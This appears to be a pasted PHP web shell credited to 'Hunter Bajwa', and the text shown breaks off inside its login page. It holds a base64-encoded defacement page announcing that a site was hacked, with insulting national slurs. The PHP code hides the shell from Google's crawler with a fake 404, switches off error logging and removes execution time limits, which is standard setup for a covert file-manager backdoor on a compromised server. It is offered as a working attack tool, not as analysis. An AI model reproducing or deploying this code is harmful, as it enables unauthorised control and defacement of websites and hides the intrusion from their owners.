· 6 years ago · Nov 13, 2019, 05:32 PM
1<?php
2/*
3 //++++++++======= Shell Made By Hunter Bajwa :) =======++++++++ //
4 //++++++++======= Special Thanks to: =======++++++++ //
5
6 https://www.facebook.com/HunterBajwaOfficial/
7 https://www.facebook.com/BlackLeets1337/
8
9 // Hope You Dont Edit iT :) //
10*/
11$auth_pass= ""; //Guess iT :V :v :V
12$deface = 'CjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KCjxoZWFkPgoJPHRpdGxlPkhhY2tlZCBCeSBIdW50ZXIgQmFqd2E8L3RpdGxlPgoJPGVtYmVkIHNyYz0iW2NvbG9yPSNGRjAwMDBdaHR0cHM6Ly93d3cueW91dHViZS5jb20vdi9sQnVMVWlkUjlyMCZhdXRvcGxheT0xWy9jb2xvcl0iIHR5cGU9ImFwcGxpY2F0aW9uL3gtc2hvY2t3YXZlLWZsYXNoIiB3bW9kZT10cmFuc3BhcmVudCB3aWR0aD0xIGhlaWdodD0xPjwvZW1iZWQ+Cgk8bGluayByZWw9IlNIT1JUQ1VUIElDT04iIGhyZWY9Imh0dHA6Ly93d3cuaWNvbnNkYi5jb20vaWNvbnMvZG93bmxvYWQvYmxhY2svc2t1bGwtNjEtMTI4LmljbyIgdHlwZT0iaW1hZ2UvZ2lmIj4KCTxtZXRhIGNoYXJzZXQ9IlVURi04Ij4KCTxtZXRhIG5hbWU9IkF1dGhvciIgY29udGVudD0iLi9IdW50ZXJfQmFqd2Egd2FzIEhlcmUhISEiLz4KCTxtZXRhIG5hbWU9ImNvcHlyaWdodCIgY29udGVudD0iLi9IdW50ZXJfQmFqd2Egd2FzIEhlcmUhISEiLz4KCTxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJXZWJzaXRlIFB3bmVkIGJ5IEh1bnRlciBCYWp3YSIvPgoJPGxpbmsgaHJlZj0naHR0cDovL2ZvbnRzLmdvb2dsZWFwaXMuY29tL2Nzcz9mYW1pbHk9SWNlbGFuZDo0MDAsNzAwJyByZWw9J3N0eWxlc2hlZXQnIHR5cGU9J3RleHQvY3NzJz4KCTxsaW5rIGhyZWY9J2h0dHA6Ly9mb250cy5nb29nbGVhcGlzLmNvbS9jc3M/ZmFtaWx5PUljZWxhbmQ6NDAwLDcwMCcgcmVsPSdzdHlsZXNoZWV0JyB0eXBlPSd0ZXh0L2Nzcyc+Cgk8bWV0YSBwcm9wZXJ0eT0ib2c6aW1hZ2UiIGNvbnRlbnQ9IiI+CiAgCQk8c3R5bGUgdHlwZT0idGV4dC9jc3MiPgoJCQlib2R5IHsKCQkJCW92ZXJmbG93OmhpZGRlbjsKCQkJCWJhY2tncm91bmQtaW1hZ2U6dXJsKCcnKTsKCQkJCWJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7CgkJCQliYWNrZ3JvdW5kLXJlcGVhdDpuby1yZXBlYXQ7CgkJCQliYWNrZ3JvdW5kLXNpemU6IDEwMCUgOwoJCQkJYmFja2dyb3VuZC1wb3NpdGlvbjp0b3AgY2VudGVyOwoJCQkJbWFyZ2luOiAwcHg7CgkJCQljdXJzb3I6bm9uZTsKCQkJCWZvbnQtZmFtaWx5OiBJY2VsYW5kLCBzYW5zLXNlcmlmOwoJCQl9CgkJCWF7CgkJCQl0ZXh0LWRlY29yYXRpb246IG5vbmU7CgkJCX0KCQkJaDF7CgkJCWZvbnQtZmFtaWx5OiBJY2VsYW5kLCBzYW5zLXNlcmlmOwoJCQlmb250LXNpemU6OTBweDsKCQkJY29sb3I6I2ZmZjsKCQkJbWFyZ2luOjBweCAwcHggMHB4OwoJCQkKCQkJfQoJCQloMnsKCQkJZm9udC1mYW1pbHk6IEljZWxhbmQsIHNhbnMtc2VyaWY7CgkJCWZvbnQtc2l6ZTo0MHB4OwoJCQljb2xvcjojMDAwOwoJCQltYXJnaW46IDBweDsKCQkJdGV4dC1zaGFkb3c6IDAgMCAzcHggI2ZmZjsKCQkJCgkJCX0KCQkJcHsKCQkJY29sb3I6IzAwMDsKCQkJZm9udC1zaXplOjI1cHg7CgkJCW1hcmdpbjogMHB4OwoJCQl0ZXh0LXNoYWRvdzogMCAwIDNweCAjZmZmOwoKCQkJfQoJCQkuZm90ewoJCQlmb250LWZhbWlseTogSWNlbGFuZCwgc2Fucy1zZXJpZjsKCQkJZm9udC1zaXplOjE0cHg7CgkJCWNvbG9yOiNmZmY7CgkJCW1hcmdpbjogMHB4OwoJCQl0ZXh0LXNoYWRvdzogMCAwIDNweCAjMDAwLCAwcHggMHB4IDVweCAjMDAwOwoJCQl9CgkJCSBoMXsKCQkJY29sb3I6IzAwMDsKCQkJdGV4dC1zaGFkb3c6IDAgMCA1cHggI2ZmZjsKCQl9CgkJLmdyZWV0c3sKCWZvbnQtZmFtaWx5OiBBcmlhbCwgc2Fucy1zZXJpZjsKCWxpbmUtaGVpZ2h0OiAyNHB4OwoJZm9udC1zaXplOiAxMXB4OwoJd2lkdGg6IDUwJTsKCWJhY2tncm91bmQ6ICMwMDA7CglvcGFjaXR5OiAwLjk7Cgl0ZXh0LXRyYW5zZm9ybTogdXBwZXJjYXNlOwoJei1pbmRleDogOTk5OTsKCWJvcmRlci1yYWRpdXM6MTBweDsKCS1tb3otYm94LXNoYWRvdzogMXB4IDBweCAycHggIzAwMDsKCS13ZWJraXQtYm94LXNoYWRvdzogMXB4IDBweCAycHggIzAwMDsKCWJveC1zaGFkb3c6IDFweCAwcHggMnB4ICMwMDA7Cn0KCQk8L3N0eWxlPgoJPC9oZWFkPiAKCTxkaXYgaWQ9IkkzMDFfaHRtbCI+Cgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwOi8vY29kZS5qcXVlcnkuY29tL2pxdWVyeS5taW4uanMiPjwvc2NyaXB0PgoKPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPnNldFRpbWVvdXQoIiQoJyNsb2FkaW5nJykuZmFkZU91dCg1MDAwKTsiLCAxMDAwMCk7ICA8L3NjcmlwdD4KCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+I2xvYWRpbmd7cG9zaXRpb246Zml4ZWQ7dG9wOjA7bGVmdDowO3BhZGRpbmctdG9wOjBweDtiYWNrZ3JvdW5kLWNvbG9yOiMwMDA7d2lkdGg6MTAwJTtoZWlnaHQ6MTAwJTtjb2xvcjpibGFjazt6LWluZGV4OjkwMDA7b3ZlcmZsb3c6aGlkZGVuO308L3N0eWxlPgogCjxkaXYgaWQ9ImxvYWRpbmciPgo8Ym9keSBvbmxvYWQ9ImRvY3VtZW50LmYucC5mb2N1cygpIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIGJnY29sb3I9IiMwMDAwMDAiIG1hcmdpbmhlaWdodD0iMCIgbWFyZ2lud2lkdGg9IjAiPgo8dGFibGUgYm9yZGVyPSIwIiBjZWxscGFkZGluZz0iMiIgY2VsbHNwYWNpbmc9IjAiIHdpZHRoPSIxMDAlIj4KPHRib2R5Pjx0cj4gCgoKPC90cj4KCQo8dHI+CgoKCjwvdHI+CjwvdGJvZHk+PC90YWJsZT4gCjxmb250IGlkPSJSZXNwb25zZURhdGEiIGNvbG9yPSIjZmY5OWNjIj4KPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7CiAgaWYoKHR5cGVvZiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCA9PSAidW5kZWZpbmVkIikgfHwgKHR5cGVvZiBlbGVtZW50LmlubmVySFRNTCA9PSAidW5kZWZpbmVkIikpIHsKICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4KICAgIHJldHVybjsKICB9CiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsKICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2sgPSAoZmluaXNoZWRDYWxsYmFjayA/IGZpbmlzaGVkQ2FsbGJhY2sgOiBmdW5jdGlvbigpIHsgcmV0dXJuOyB9KTsKICB0aGlzLmludGVydmFsID0gKHR5cGVvZiBpbnRlcnZhbCA9PSAidW5kZWZpbmVkIiA/IDEwMCA6IGludGVydmFsKTsKICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsKICB0aGlzLnVucGFyc2VkT3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0OwogIHRoaXMuY3Vyc29yID0gKGN1cnNvciA/IGN1cnNvciA6ICIiKTsKICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7CiAgdGhpcy5jdXJyZW50Q2hhciA9MDsKICB0aGlzLmVsZW1lbnQudHlwaW5nVGV4dCA9IHRoaXM7CiAgaWYodGhpcy5lbGVtZW50LmlkID09ICIiKSB0aGlzLmVsZW1lbnQuaWQgPSAidHlwaW5ndGV4dCIgKyBUeXBpbmdUZXh0LmN1cnJlbnRJbmRleCsrOwogIFR5cGluZ1RleHQuYWxsLnB1c2godGhpcyk7CiAgdGhpcy5ydW5uaW5nID0gZmFsc2U7CiAgdGhpcy5pblRhZyA9IGZhbHNlOwogIHRoaXMudGFnQnVmZmVyID0gIiI7CiAgdGhpcy5pbkhUTUxFbnRpdHkgPSBmYWxzZTsKICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgPSAiIjsKfQpUeXBpbmdUZXh0LmFsbCA9IG5ldyBBcnJheSgpOwpUeXBpbmdUZXh0LmN1cnJlbnRJbmRleCA9IDA7ClR5cGluZ1RleHQucnVuQWxsID0gZnVuY3Rpb24oKSB7CiAgZm9yKHZhciBpID0gMDsgaSA8IFR5cGluZ1RleHQuYWxsLmxlbmd0aDsgaSsrKSBUeXBpbmdUZXh0LmFsbFtpXS5ydW4oKTsKfQpUeXBpbmdUZXh0LnByb3RvdHlwZS5ydW4gPSBmdW5jdGlvbigpIHsKICBpZih0aGlzLnJ1bm5pbmcpIHJldHVybjsKICBpZih0eXBlb2YgdGhpcy5vcmlnVGV4dCA9PSAidW5kZWZpbmVkIikgewogICAgc2V0VGltZW91dCgiZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJyIgKyB0aGlzLmVsZW1lbnQuaWQgKyAiJykudHlwaW5nVGV4dC5ydW4oKSIsIHRoaXMuaW50ZXJ2YWwpOwkvLyBXZSBoYXZlbid0IGZpbmlzaGVkIGxvYWRpbmcgeWV0LiAgSGF2ZSBwYXRpZW5jZS4KICAgIHJldHVybjsKICB9CiAgaWYodGhpcy5jdXJyZW50VGV4dCA9PSAiIikgdGhpcy5lbGVtZW50LmlubmVySFRNTCA9ICIiOwovLyAgdGhpcy5vcmlnVGV4dCA9IHRoaXMub3JpZ1RleHQucmVwbGFjZSgvPChbXjxdKSo+LywgIiIpOyAgICAgLy8gU3RyaXAgSFRNTCBmcm9tIHRleHQuCiAgaWYodGhpcy5jdXJyZW50Q2hhciA8IHRoaXMub3JpZ1RleHQubGVuZ3RoKSB7CiAgICBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiPCIgJiYgIXRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgPSAiPCI7CiAgICAgIHRoaXMuaW5UYWcgPSB0cnVlOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSBpZih0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKSA9PSAiPiIgJiYgdGhpcy5pblRhZykgewogICAgICB0aGlzLnRhZ0J1ZmZlciArPSAiPiI7CiAgICAgIHRoaXMuaW5UYWcgPSBmYWxzZTsKICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLnRhZ0J1ZmZlcjsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5pblRhZykgewogICAgICB0aGlzLnRhZ0J1ZmZlciArPSB0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKTsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIiYiICYmICF0aGlzLmluSFRNTEVudGl0eSkgewogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgPSAiJiI7CiAgICAgIHRoaXMuaW5IVE1MRW50aXR5ID0gdHJ1ZTsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIjsiICYmIHRoaXMuaW5IVE1MRW50aXR5KSB7CiAgICAgIHRoaXMuSFRNTEVudGl0eUJ1ZmZlciArPSAiOyI7CiAgICAgIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy5IVE1MRW50aXR5QnVmZmVyOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSBpZih0aGlzLmluSFRNTEVudGl0eSkgewogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIHsKICAgICAgdGhpcy5jdXJyZW50VGV4dCArPSB0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKTsKICAgIH0KICAgIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSB0aGlzLmN1cnJlbnRUZXh0OwogICAgdGhpcy5lbGVtZW50LmlubmVySFRNTCArPSAodGhpcy5jdXJyZW50Q2hhciA8IHRoaXMub3JpZ1RleHQubGVuZ3RoIC0gMSA/ICh0eXBlb2YgdGhpcy5jdXJzb3IgPT0gImZ1bmN0aW9uIiA/IHRoaXMuY3Vyc29yKHRoaXMuY3VycmVudFRleHQpIDogdGhpcy5jdXJzb3IpIDogIiIpOwogICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgc2V0VGltZW91dCgiZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJyIgKyB0aGlzLmVsZW1lbnQuaWQgKyAiJykudHlwaW5nVGV4dC5ydW4oKSIsIHRoaXMuaW50ZXJ2YWwpOwogIH0gZWxzZSB7Cgl0aGlzLmN1cnJlbnRUZXh0ID0gIiI7Cgl0aGlzLmN1cnJlbnRDaGFyID0gMDsKICAgICAgICB0aGlzLnJ1bm5pbmcgPSBmYWxzZTsKICAgICAgICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2soKTsKICB9Cn0KPC9zY3JpcHQ+CjxzY3JpcHQ+CmZ1bmN0aW9uIGRpc2FibGVzZWxlY3QoZSl7cmV0dXJuIGZhbHNlfQoKZnVuY3Rpb24gcmVFbmFibGUoKXtyZXR1cm4gdHJ1ZX0KCi8vaWYgSUU0Kwpkb2N1bWVudC5vbnNlbGVjdHN0YXJ0PW5ldyBGdW5jdGlvbiAoInJldHVybiBmYWxzZSIpCgovL2lmIE5TNgppZiAod2luZG93LnNpZGViYXIpewpkb2N1bWVudC5vbm1vdXNlZG93bj1kaXNhYmxlc2VsZWN0CmRvY3VtZW50Lm9uY2xpY2s9cmVFbmFibGUKfQo8L3NjcmlwdD4KPHNjcmlwdD4KdmFyIG1lc3NhZ2U9IiI7CmZ1bmN0aW9uIGNsaWNrSUUoKQoKe2lmIChkb2N1bWVudC5hbGwpCnsobWVzc2FnZSk7cmV0dXJuIGZhbHNlO319CgpmdW5jdGlvbiBjbGlja05TKGUpIHsKaWYKKGRvY3VtZW50LmxheWVyc3x8KGRvY3VtZW50LmdldEVsZW1lbnRCeUlkJiYhZG9jdW1lbnQuYWxsKSkKewppZiAoZS53aGljaD09Mnx8ZS53aGljaD09MykgeyhtZXNzYWdlKTtyZXR1cm4gZmFsc2U7fX19CmlmIChkb2N1bWVudC5sYXllcnMpCntkb2N1bWVudC5jYXB0dXJlRXZlbnRzKEV2ZW50Lk1PVVNFRE9XTik7ZG9jdW1lbnQuICBvbm1vdXNlZG93bj1jbGlja05TO30KZWxzZQp7ZG9jdW1lbnQub25tb3VzZXVwPWNsaWNrTlM7ZG9jdW1lbnQub25jb250ZXh0bWVudSAgPWNsaWNrSUU7fQoKZG9jdW1lbnQub25jb250ZXh0bWVudT1uZXcgRnVuY3Rpb24oInJldHVybiBmYWxzZSIpCjwvc2NyaXB0PgoKPHRhYmxlIHN0eWxlPSIgYmFja2dyb3VuZC1yZXBlYXQ6IG5vLXJlcGVhdDsiICBhbGlnbj0icmlnaHQiIGJvcmRlcj0iMCIgd2lkdGg9IjEwMCUiID4KCjxicj4KCjx0Ym9keT48dHI+Cjx0ZCAgdmFsaWduPSJ0b3AiPjxwIGlkPSJoYWNrIiA+Cgo8YnIgLz4KPGJyPgo8Zm9udCBjb2xvcj0iR3JlZW4iPiAmbmJzcDsmbmJzcDsmbmJzcDsmbmJzcDs8Yj5bK11IdW50ZXIgQmFqd2Egd2FzIEhlcmUhISAgICAgICAgPC9mb250PiA8YnI+Cjxmb250IGNvbG9yPSJHcmVlbiI+ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxiPlsrXURlYXIgTXIuQWRtaW5pc3RyYXRvciAgIDwvZm9udD48YnI+Cjxmb250IGNvbG9yPSJHcmVlbiI+ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxiPlsrXVBsZWFzZSBQYXRjaCB5b3VyIFN5c3RlbTwvZm9udD48YnI+Cjxmb250IGNvbG9yPSJHcmVlbiI+ICZuYnNwOyZuYnNwOyZuYnNwOyZuYnNwOzxiPlsrXSB+IC4vSHVudGVyX0JhandhICAgICAgICA8L2ZvbnQ+IDxicj4KCQkJCQkgPGZvbnQgY29sb3I9IkdyZWVuIj4gCgkKICAgICAgICAgIAo8L3A+PC90cj4KPC90Ym9keT48L3RhYmxlPiAgICAgICAgICAgICAgICAgPC9kaXY+IAo8YnI+Cgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Cm5ldyBUeXBpbmdUZXh0KGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJoYWNrIiksIDUwLCBmdW5jdGlvbihpKXsgdmFyIGFyID0gbmV3IEFycmF5KCJfIiwiIik7IHJldHVybiAiICIgKyBhcltpLmxlbmd0aCAlIGFyLmxlbmd0aF07IH0pOwpUeXBpbmdUZXh0LnJ1bkFsbCgpOwoKPC9zY3JpcHQ+CgogICAgPHN0eWxlPiAKIAogICAgICB0ZAogCiAgICAgIHsKIAogICAgICAgIGJhY2tncm91bmQtY29sb3I6ICMwMDAwMDA7CiAKICAgICAgICBmb250LWZhbWlseTogQ291cmllciBOZXc7CiAKICAgICAgICBmb250LXNpemU6MjBweDsKIAogICAgICAgIGNvbG9yOiMwMDAwMDA7CiAKICAgICAgICBib3JkZXItY29sb3I6ICMwMDAwMDA7CiAKICAgICAgICBib3JkZXItd2lkdGg6MXB0OwogCiAgICAgICAgYm9yZGVyLXN0eWxlOnNvbGlkOwogCiAgICAgICAgYm9yZGVyLWNvbGxhcHNlOmNvbGxhcHNlOwogCiAgICAgICAgcGFkZGluZzowcHQgM3B0OwogCiAgICAgICAgdmVydGljYWwtYWxpZ246dG9wOwogCiAgICAgIH0KIAogICAgICB0YWJsZQogCiAgICAgIHsKIAogICAgICAgIGJvcmRlci1jb2xvcjogIzg4YWFjZTsKIAogICAgICAgIGJvcmRlci13aWR0aDowcHQgMXB0OwogCiAgICAgICAgYm9yZGVyLXN0eWxlOmRhc2g7CiAKICAgICAgfQogCiAgICAgIEE6TGluaywgQTpWaXNpdGVkCiAKICAgICAgewogCiAgICAgICAgY29sb3I6ICM4OGFhY2U7CiAKICAgICAgfQogCiAgICAgIEEubm86TGluaywgQS5ubzpWaXNpdGVkCiAKICAgICAgewogCiAgICAgICAgY29sb3I6ICM4OGFhY2U7CiAKICAgICAgICB0ZXh0LWRlY29yYXRpb246IG5vbmU7CiAKICAgICAgfQogCiAgICAgIEE6SG92ZXIsIEE6VmlzaXRlZDpIb3ZlciAsIEEubm86SG92ZXIsIEEubm86VmlzaXRlZDpIb3ZlcgogCiAgICAgIHsKIAogICAgICAgIGNvbG9yOiAjODhhYWNlOwogCiAgICAgICAgYmFja2dyb3VuZC1jb2xvcjojMmUyZTJlOwogCiAgICAgICAgdGV4dC1kZWNvcmF0aW9uOgogCiAgICAgICAgb3ZlcmxpbmUgdW5kZXJsaW5lOwogCiAgICAgIH0KIAogICAgICAuc3R5bGUxCiAKICAgICAgewogCiAgICAgICAgY29sb3I6ICM4OGFhY2UKIAogICAgICB9CiAKICAgICAgLnN0eWxlMgogCiAgICAgIHsKIAogICAgICAgIGNvbG9yOiAxZjFmMWYKIAogICAgICB9CiAKICAgICAgYm9keQogCiAgICAgIHsKIAogICAgICAgIGNvbG9yOndoaXRlOwogICAgICAgICAKICAgICAgICBiYWNrZ3JvdW5kLXBvc2l0aW9uOnJpZ2h0OwogCiAgICAgICAgYmFja2dyb3VuZC1hdHRhY2htZW50OmZpeGVkOwogCiAgICAgICAgPC9kaXY+CiAKICAgICAgfQogCiAgICA8L3N0eWxlPgogICAgICAgIAogCjwvZGl2PgoKPC9kaXY+Cjxib2R5IG9uY29udGV4dG1lbnU9InJldHVybiBmYWxzZSIgb25rZXlkb3duPSJyZXR1cm4gZmFsc2UiPgo8Y2VudGVyPgo8aDIgY2xhc3M9Imdsb3ciPkhhY2tlZCBCeSBIdW50ZXIgQmFqd2E8L2gyPgo8aW1nIHNyYz0iaHR0cHM6Ly9pLndhcm9zdS5vcmcvZGF0YS9zY2kvaW1nLzAwNzQvMjkvMTQzODE5OTgzMDAxNi5wbmciIHdpZHRoPSIyMCUiPgo8aDIgY2xhc3M9Imdsb3cyIiA+Ljo6VGVhbSBCbGFja0xlZXRzOjouPGJyPiA8YSBocmVmPSJodHRwczovL3d3dy5mYWNlYm9vay5jb20vQmxhY2tMZWV0czEzMzcvIj5PZmZpY2lhbCBQYWdlIDwvYT48YnI+PGEgaHJlZj0iaHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL0h1bnRlckJhandhT2ZmaWNpYWwvIj5IdW50ZXIgQmFqd2EgT2ZmaWNpYWwgUGFnZSA8L2E+PC9wPjwvYj48L2gyPgo8cD48Yj5Zb3VyIFNpdGUncyBTZWN1cml0eSBIYXMgQmVlbiBGVUNLRUQgPHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OkljZWxhbmQ7Y29sb3I6cmVkO3RleHQtc2hhZG93OnJlZCAwcHggMHB4IDNweCI+Li9IdW50ZXIgQmFqd2EgPC9zcGFuPgoJCQkjTWlzc2lvbl9ZZXMtVG9pbGV0cyA8Zm9udCBzdHlsZT0iY29sb3I6cmVkO3RleHQtc2hhZG93OiMwMDAgMHB4IDBweCAzcHgiPkVuZ2FnZWQ8L2ZvbnQ+IFRoYXQgb25lIHBvb3IgY291bnRyeSB3aXRoIGdheSBmb3VuZGVyLiBUaGF0IG9uZSBQb29yIENvdW50cnkgd2l0aCBDaG90aSBDaG90aSBMdWxpeWFhbiAoR09vZ2xlIGl0KQpUaGF0IG9uZSBQb29yIENvdW50cnkgd2l0aCBzdHVwaWQgUHJpbWUgTWluaXN0ZXIgKEdvb2dsZSBpdCkuClRoYXQgb25lIHBvb3IgY291bnRyeSB3aG8gY2FuJ3QgQWZmb3JkIHNuYXBjaGF0IDpWClRoYXQgb25lIHBvb3IgY291bnRyeSB3aXRoIGNoYWlsd2FsYSBwbS4KdGhhdCBvbmUgcG9vciBjb3VudHJ5IHBlb3BsZSB3aG8gcG9vcCBvbiByYWlsd2F5cyA6VgoKCgkJICAgIDwvcD4KCQk8L3NwYW4+CgkJCTxkaXYgc3R5bGU9ImZvbnQtc2l6ZToxMHB4O2NvbG9yOmdvbGQ7dGV4dC1zaGFkb3c6Z3JleSAwcHggMHB4IDNweCI+CgkJPHNwYW4gc3R5bGU9ImZvbnQtZmFtaWx5OkljZWxhbmQ7Zm9udC13ZWlnaHQ6Ym9sZDtjb2xvcjojZmZmZmZmIj48cD5+U0VDVVJJVFkgSVMgSlVTVCBBTiBJTExVU0lPTn48L3A+PC9zcGFuPgoJPC9kaXY+CiAKPGRpdiBjbGFzcz0iZ3JlZXRzIj4KPHRhYmxlIGFsaWduPWNlbnRlciBib3JkZXI9IjAiPgo8dHI+Cjx0ZCB3aWR0aD0xMDAlIGlkPWdyZWV0ej4KPG1hcnF1ZWUgYmVoYXZpb3I9InNjcm9sbCIgZGlyZWN0aW9uPSJsZWZ0IiBzY3JvbGxhbW91bnQ9IjQiIHNjcm9sbGRlbGF5PSI1NSIgd2lkdGg9IjEwMCUiPgo8Zm9udCBzaXplPSI1cHgiIHN0eWxlPSJmb250LWZhbWlseTogSWNlbGFuZCwgc2Fucy1zZXJpZjtjb2xvcjpibGFjazt0ZXh0LXNoYWRvdzogMCAwIDNweCByZWQsIDBweCAwcHggNXB4IHJlZCIgPgo8Yj4tPXwgR3JlZXR6IHRvIHxIdW50ZXIgQmFqd2EgfHwgUmpfZDN8fCBYYW0gM3hQbG9pVGVSIHx8ICBCbGFja2hhdHRpZ2VyIHx8IEh1bnRlciBNYWZpYSBEb24gfCBEMyBEYXNpbiB8fCBMM0czbkQgSyExMTNSIHx8IFJASDMzTV9IYXhvciB8Li4uIEFuZCBBbGwgUGFraXN0YW5pIEhhY2tlcnMgundefinedCB8PC9mb250Pgo8L21hcnF1ZWU+CjwvdGQ+CjwvdGFibGU+PC9kaXY+IAo8ZGl2IGNsYXNzPSJmb3QiPgpDb3B5cmlnaHRzICZjb3B5OyBINElEM3IKPC9kaXY+CjwvY2VudGVyPgo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+Ci8vPCFbQ0RBVEFbCihmdW5jdGlvbigpIHsKdmFyIF9hbmFseXRpY3Nfc2NyID0gZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgnc2NyaXB0Jyk7Cl9hbmFseXRpY3Nfc2NyLnR5cGUgPSAndGV4dC9qYXZhc2NyaXB0JzsgX2FuYWx5dGljc19zY3IuYXN5bmMgPSB0cnVlOyBfYW5hbHl0aWNzX3Njci5zcmMgPSAnL19JbmNhcHN1bGFfUmVzb3VyY2U/U1dKSVlMV0E9Mjk3N2Q4ZDc0ZjYzZDdmOGZlZGJlYTAxOGI3YTFkMDUmbnM9MSc7CnZhciBfYW5hbHl0aWNzX2VsZW0gPSBkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgnc2NyaXB0JylbMF07IF9hbmFseXRpY3NfZWxlbS5wYXJlbnROb2RlLmluc2VydEJlZm9yZShfYW5hbHl0aWNzX3NjciwgX2FuYWx5dGljc19lbGVtKTsKfSkoKTsKLy8gXV0+Cjwvc2NyaXB0PjwvYm9keT4='; //deface in base64.
13 //Change Shell Theme here//
14$color = "#ABEFFF"; //Fonts color modify here.
15$Theme = '#09B5A6'; //Change border-color accoriding to your choice.
16$TabsColor = '#0E5061'; //Change tabs color here.
17$default_action = 'FilesMan';
18@define('SELF_PATH', __FILE__);
19if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
20 header('HTTP/1.0 404 Not Found');
21 exit;
22}
23
24@session_start();
25@error_reporting(0);
26@ini_set('error_log',NULL);
27@ini_set('display_errors',0);
28@ini_set('log_errors',0);
29@ini_set('max_execution_time',0);
30@set_time_limit(0);
31@set_magic_quotes_runtime(0);
32if( get_magic_quotes_gpc() ) {
33 function stripslashes_array($array) {
34 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
35 }
36 $_POST = stripslashes_array($_POST);
37}
38
39function HunterBajwalogin() {
40 die ('<!DOCTYPE html>
41<html>
42 <head>
43 <title>Hunter Bajwa</title>
44 <meta charset="UTF-8">
45 <meta http-equiv="refresh" content=""> <!-- For Refreshing after ____ interval of time -->
46 <meta name="description" content="Sites description">
47 <meta name="about" content="Made By Hunter Bajwa">
48 <link href="http://i.imgur.com/wJDvuRs.png" rel="Shortcut Icon" />
49 <meta name="description" content="For Logging into the system">
50 <style>
51 .body {
52 margin-top: 7vh;
53 text-transform: capitalize;
54 background: black url("http://i.imgur.com/vRlLG1T.jpg");
55 background-repeat:no-repeat;
56 background-position: center;
57 background-attachment: fixed;
58 -webkit-background-size: cover;
59 -moz-background-size: cover;
60 -o-background-size: cover;
61 background-size: cover;
62 }
63 .font {
64 font-family: calibri;
65 font-size: 300%;
66 text-align: center;
67 color: white;
68 }
69 .upass {
70 margin-top: 70vh;
71 font-family: calibri;
72 font-size: 100%;
73 text-align: center;
74 color: black;
75 }
76 .input {
77 margin:0;background-color:black;border:1px solid black;
78 }
79 </style>
80 <script language="JavaScript1.2">
81 function ejs_nodroit(){
82 alert("Login Please!");
83 return(false);
84 }
85 document.oncontextmenu = ejs_nodroit;
86 </script>
87 </head>
88
89 <body class="body">
90 <div class="font">
